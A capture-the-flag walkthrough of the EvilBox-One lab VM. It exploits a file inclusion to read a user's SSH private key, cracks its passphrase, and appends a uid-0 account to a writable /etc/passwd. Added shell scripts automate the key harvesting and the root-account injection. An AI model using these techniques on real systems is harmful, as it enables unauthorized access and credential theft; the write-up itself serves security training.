EvilBox-One walkthrough

Key points

  • This is essentially a black-box test: with no clues at all, the only option is to guess (enumerate). Finding a PHP file makes getting a foothold considerably easier.
  • Even once a PHP file is found, its code is unknown, so all that can be done is to test whether it has a file inclusion vulnerability.
  • So whenever there are no leads, guessing is the only way forward.

Steps

The nmap scan shows only ports 22 and 80 open, and port 80 serves nothing but the Apache default page, so there are no leads there.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 12:58 UTC
Nmap scan report for 192.168.56.212
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works

nikto, however, turns up some additional information: robots.txt and the /secret/ path.

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.212
+ Target Hostname:    192.168.56.212
+ Target Port:        80
+ Start Time:         2024-12-02 12:59:17 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-12-02 12:59:33 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

robots.txt contains `Hello H4x0r`, which does not appear to be useful, and there are few other leads, so the /secret/ path is brute-forced for PHP files. This turns up evil.php, which answers with a 200 and an empty body (Size: 0), a detail that matters for the filtering in the next step.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.225.212/secret/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/evil.php             (Status: 200) [Size: 0]

Next, test for a file inclusion vulnerability by fuzzing the parameter name with /etc/passwd as the value and filtering out the empty responses (-fs 0). The inclusion does exist, and the parameter is named command.

C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

command                 [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 448ms]
:: Progress: [4730/4730] :: Job [1/1] :: 92 req/sec :: Duration: [0:00:57] :: Errors: 0 ::

Including /etc/passwd first and then /home/mowree/.ssh/id_rsa yields a private key that can be used to log in. One caveat: if you open http://192.168.225.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa in a browser, you must use "view page source" to get the correctly formatted RSA key; the rendered page collapses the line breaks and ssh will refuse the result. Fetching the URL with curl and saving the body directly avoids the problem.
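The passwd-to-key step above, as an added example that is not part of the original walkthrough: read the passwd file through the inclusion, pick out the accounts that can actually own a usable SSH key, fetch each candidate key with curl so its line breaks survive, and verify the saved file before handing it to ssh or ssh2john. The target address and the parameter name `command` are taken from the walkthrough; the helper names, the `LFI_LIVE` switch and the sample passwd data are this example's own constructions.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: turn the /etc/passwd read
# through the inclusion into a list of accounts worth stealing a key from,
# fetch each candidate key with curl so its line breaks survive, and check
# the saved file before handing it to ssh or ssh2john.
# TARGET and the parameter name "command" come from the walkthrough; the
# sample data below is constructed for the demo.

TARGET="${TARGET:-http://192.168.225.212}"
LFI_URL="$TARGET/secret/evil.php?command="

# Print "user:home" for every passwd line with an interactive shell and a
# home under /home or /root.  Reads passwd text on stdin.  (root's key will
# normally be unreadable by www-data; it is listed so the failure is explicit.)
login_users() {
    awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ && $6 ~ /^\/(home|root)/ { print $1 ":" $6 }'
}

# Candidate private-key paths to include next, one per line.
candidate_keys() {
    login_users | awk -F: '{ print $2 "/.ssh/id_rsa" }'
}

# Fetch a file through the inclusion and save the raw bytes.  evil.php
# returns an empty 200 for a missing file (that is why ffuf used -fs 0), so
# an empty download is treated as failure.
fetch_via_lfi() {  # usage: fetch_via_lfi <remote path> <local file>
    curl -s "${LFI_URL}$1" -o "$2" && [ -s "$2" ] && chmod 600 "$2"
}

# A key copied out of a rendered HTML page collapses to one line and ssh
# rejects it.  Accept the file only if the PEM framing is intact and the
# body still spans several lines.
pem_intact() {  # usage: pem_intact <file>
    head -n 1 "$1" | grep -q '^-----BEGIN ' || return 1
    tail -n 1 "$1" | grep -q '^-----END '   || return 1
    [ "$(wc -l < "$1")" -gt 2 ]
}

# Constructed sample passwd (NOT the box's real file): system accounts plus
# the user the walkthrough found.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash'

if [ "${LFI_LIVE:-0}" = 1 ]; then
    # Live run against the target: read passwd, then try every candidate key.
    fetch_via_lfi /etc/passwd passwd.txt || exit 1
    login_users < passwd.txt | while IFS=: read -r user home; do
        if fetch_via_lfi "$home/.ssh/id_rsa" "id_rsa.$user" && pem_intact "id_rsa.$user"; then
            echo "saved id_rsa.$user (try: ssh -i id_rsa.$user $user@${TARGET#http://})"
        fi
    done
else
    # Offline demo on the constructed sample: prints the two candidate paths.
    printf '%s\n' "$SAMPLE_PASSWD" | candidate_keys
fi
```

Run it with `LFI_LIVE=1` against the box to do the fetching for real; without it the script only exercises the parsing on the sample data. The `-s` size check on the download is what distinguishes "file unreadable or missing" from success, since the page returns a blank 200 either way.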


Logging in over ssh with the obtained key prompts for a passphrase. The robots.txt string does not work, so crack it with john (after converting the key with ssh2john): the passphrase is unicorn, and logging in with it succeeds.

C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh2john id_rsa > id_rsa.hash
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)     
1g 0:00:00:00 DONE (2024-12-02 22:35) 33.33g/s 41600p/s 41600c/s 41600C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh -i id_rsa mowree@192.168.225.212                        
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ 

After logging in, SUID binaries and sudo -l turn up nothing useful, but uploading and running linpeas.sh reveals that /etc/passwd is readable and writable by every user (worth confirming with ls -l /etc/passwd before relying on it).

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 feb 10  2019 usr.bin.man
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

First construct a passwd record and append it to /etc/passwd. The password hash comes from openssl passwd (classic crypt(3) format here), and the uid and gid fields of 0:0 are what make the new account root regardless of its name; su to it with the chosen password (1234) then gives a root shell.

mowree@EvilBoxOne:~$ openssl passwd 1234
iQPI1FVnABms.
mowree@EvilBoxOne:~$ echo "tim:iQPI1FVnABms.:0:0:root:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:~$ su tim
Contraseña: 
root@EvilBoxOne:/home/mowree# cat /root/proof.txt
d8033de92c0ee15a21ae22c39b979663
root@EvilBoxOne:/home/mowree# cat local.txt
07894098e76a0de660070a673dd51a6e
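The same escalation as a checked procedure, added here as an example and not part of the original walkthrough: it classifies the hash you are about to append, builds the record, and refuses to write if the file is not writable, the name already exists, or the hash would corrupt the field layout. The account name `tim` and password `1234` follow the walkthrough; the helper names, the `DO_IT` switch, the constructed passwd copy used for the offline demo and the choice of SHA-512 crypt are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: the writable
# /etc/passwd escalation as a checked procedure rather than a bare echo.
# The account name "tim" and password 1234 follow the walkthrough; the
# checks, helper names and the SHA-512 choice are this example's own.

PASSWD_FILE="${PASSWD_FILE:-/etc/passwd}"

# Classify a crypt(3) hash by its prefix, so you know what you are appending.
# 'openssl passwd' with no algorithm flag gives 13-character DES crypt on
# OpenSSL 1.1.1 (what the walkthrough got) but MD5 crypt ($1$) on 3.x; glibc
# accepts both, but -6 (SHA-512 crypt) is the sensible choice on a modern box.
hash_type() {  # usage: hash_type <hash>
    case "$1" in
        '$6$'*) echo sha512crypt ;;
        '$5$'*) echo sha256crypt ;;
        '$y$'*) echo yescrypt ;;
        '$1$'*) echo md5crypt ;;
        *) if [ "${#1}" -eq 13 ]; then echo descrypt; else echo unknown; fi ;;
    esac
}

# The passwd line itself.  uid 0 and gid 0 are what make the account root;
# the name is irrelevant, which is why "tim" works as well as "root".
passwd_entry() {  # usage: passwd_entry <name> <hash>
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Preconditions: the file must be writable by us, the name must not already
# exist (getpwnam returns the first matching line, so a duplicate is simply
# ignored), and the hash must not contain ':', which would shift the fields.
can_append() {  # usage: can_append <name> <hash> [passwd file]
    f="${3:-$PASSWD_FILE}"
    [ -w "$f" ] || return 1
    grep -q "^$1:" "$f" && return 1
    case "$2" in *:*) return 1 ;; esac
    return 0
}

# Do it for real: hash the password, check, append, and say how to use it.
add_root_account() {  # usage: add_root_account <name> <password>
    hash=$(openssl passwd -6 "$2") || return 1
    can_append "$1" "$hash" || { echo "refusing to write $PASSWD_FILE" >&2; return 1; }
    passwd_entry "$1" "$hash" >> "$PASSWD_FILE" || return 1
    echo "appended a $(hash_type "$hash") entry for $1; run: su $1"
}

# Offline demo on a constructed copy (NOT the real file), so nothing is touched.
demo=$(mktemp)
printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
               'mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash' > "$demo"
echo "walkthrough hash is $(hash_type 'iQPI1FVnABms.'): $(passwd_entry tim 'iQPI1FVnABms.')"
can_append tim 'iQPI1FVnABms.' "$demo" && echo "tim can be appended to $demo"
can_append mowree 'iQPI1FVnABms.' "$demo" || echo "mowree already exists; a second line would be ignored"
rm -f "$demo"

# On the target: DO_IT=1 sh this.sh   (PASSWD_FILE defaults to /etc/passwd)
if [ "${DO_IT:-0}" = 1 ]; then
    add_root_account tim 1234
fi
```

The duplicate-name check is the one that bites in practice: appending a second `root:` line does nothing, because name lookups return the first match, which is why the walkthrough uses a fresh name with uid 0 rather than overwriting root's hash.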

http://www.dtcms.com/wzjs/171279.html
